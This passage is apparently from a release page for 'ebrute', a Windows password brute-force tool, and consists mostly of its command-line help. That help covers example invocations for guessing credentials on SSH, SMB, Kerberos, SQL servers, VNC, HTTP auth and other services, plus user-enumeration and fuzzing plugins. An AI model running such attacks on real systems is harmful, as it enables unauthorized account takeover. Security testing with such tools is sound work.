  • Save the progress at any time by pressing F12
  • Requires .net framework 2 or above.
Limitations and future work
  • Loads all the passwords at the start so it's a proper memory hog.
  • Probably a million bugs - just let me know.
Download:
http://www.r00t.tv/p/downloads.html

Details:

C:\tools\dev\br>ebrute.exe
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help
finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.

C:\tools\dev\br>ebrute -rr
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help

Name:         finger
Description:  Finger enumeration plugin
Extra params: Specify any char to enable fast mode. Warning it can temporarily kill the service!
Examples:     -r finger -P fingerids.txt -h 10.0.0.1

Name:         ftp
Description:  FTP plugin
Extra params: None
Examples:     -r=ftp -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         kerbauth
Description:  Kerberos authentication plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r kerbauth -e shcdomain -u administrator,admin -P passes.txt -h 10.0.0.1

Name:         kerbenum
Description:  Kerberos user enumeration plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         kerbenumtcp
Description:  Kerberos user enumeration plugin (TCP) [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         ldap
Description:  ldap plugin [2k3]
Extra params: The Windows domain (essential for windows auth!)
Examples:     -r=ldap -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8 -e=win2k3r2domain

Name:         lw
Description:  Local Windows plugin
Extra params: None
Examples:     -r=lw -u=administrator -P=c:\passes.txt -h=127.0.0.1 -t=8

Name:         mssql
Description:  MSSQL SQL Server auth plugin (raw!)
Extra params: None
Examples:     -r=mssql -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlodbc
Description:  MSSQL SQL Server auth plugin (ODBC connection)
Extra params: None
Examples:     -r=mssqlodbc -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlole
Description:  MSSQL SQL Server auth plugin (OLEDB Connection)
Extra params: None
Examples:     -r=mssqlole -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlmanaged
Description:  MSSQL SQL Server auth plugin (Managed Code)
Extra params: None
Examples:     -r=mssqlmanaged -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mysql
Description:  MySQL SQL Server auth plugin
Extra params: None
Examples:     -r=mysql -u=root -P=c:\passes.txt -h=10.0.0.1 -t=4

Name:         pop3
Description:  POP3 plugin
Extra params: If IIS, fully qualified domain, e.g. example.com
Examples:     -r pop3 -h 74.125.79.109 -s -u test@gmail.com -P passes.txt

Name:         postgres
Description:  Postgres SQL Server auth plugin
Extra params: None
Examples:     -r=postgres -u=postgres -P=c:\passes.txt -h=10.0.0.1 -j -n -t=4

Name:         process
Description:  External process plugin
Extra params: postiveExitCode:::command .e.g.
Examples:     -e=1:::a.exe -a -u #user# -p #pass# -pn #port# -e #extra#

Name:         smbrawlmv2sh
Description:  SMB Raw LMv2 plugin [prob more XP/Vista/W2K3/W2K8 any LM setting, single host only!]
Extra params: None
Examples:     -r=smbrawlmv2 -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawlmv2mh
Description:  SMB Raw LMv2 plugin (ensures a single thread per host)
Extra params: None
Examples:     -r=smbrawlmv2mh -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawntlmv2mh
Description:  SMB Raw NTLMv2 plugin [no vista/2k8 support + ensures single thread per host]
Extra params: None
Examples:     -r=smbrawntlm2single -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbapilm
Description:  SMB plugin (LM lm=0 compatible with 0,1,2 and 3)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapilm -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlm
Description:  SMB plugin (NTLM lm=2 compatible with 3,4 and 5)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlm -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlmv2
Description:  SMB plugin (NTLM2 lm=5 compatible with 0,1,2,3,4 and 5, supposedly!)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlmv2 -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smtplogin
Description:  SMTP login auth plugin [login is an authentication type like NTLM]
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpcram
Description:  SMTP CRAM-MD5 auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlm
Description:  SMTP NTLM auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlmbasic
Description:  SMTP NTLM/Basic auth plugin [w2k]
Extra params: None
Examples:

Name:         snmp
Description:  SNMP plugin
Extra params: None
Examples:     -r=snmp -P=c:\passes.txt -h=10.0.0.1 -d -t=16

Name:         ssh
Description:  SSH auth plugin
Extra params: None
Examples:     -r=ssh -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         sshalt
Description:  SSH alternate auth plugin, multiple auths/connect - slighly faster for one user
Extra params: None
Examples:     -r=sshalt -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         tcpfuzzerrandom
Description:  TCP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=tcpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkpt
Description:  TKPT plugin
Extra params: None
Examples:     -r=tkpt -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkptrandom
Description:  TKPT random data plugin
Extra params: None
Examples:     -r=tkptrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tftp
Description:  TFTP plugin
Extra params: Optional path prefix, e.g. /etc/  (tip: watch windows firewall)
Examples:     -r=tftp -P=c:\unix_just_files.txt -h=10.0.0.1 -t=16

Name:         udpfuzzerrandom
Description:  UDP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=udpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         vmware
Description:  VMware ESX/VC plugin
Extra params: None
Examples:     -r=vmware -u=root -P=c:\passes.txt -h=10.0.0.1 -s -t=4

Name:         vnc
Description:  VNC plugin
Extra params: None
Examples:

Name:         wmi
Description:  WMI plugin
Extra params: The wmi end point, defaults to \ROOT\CIMV2
Examples:     -r=wmi -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         wwwbasic
Description:  WWW basic auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwbasic -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windowsdomain

Name:         wwwdigest
Description:  WWW digest auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwdigest -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windomain

Name:         wwwntlm
Description:  WWW NTLM auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlm -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e awindomain

Name:         wwwntlmv2
Description:  WWW NTLMv2 auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlmv2 -h 10.9.9.1 -u administrator -p blah -e win2k3r2domain -t 8

  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)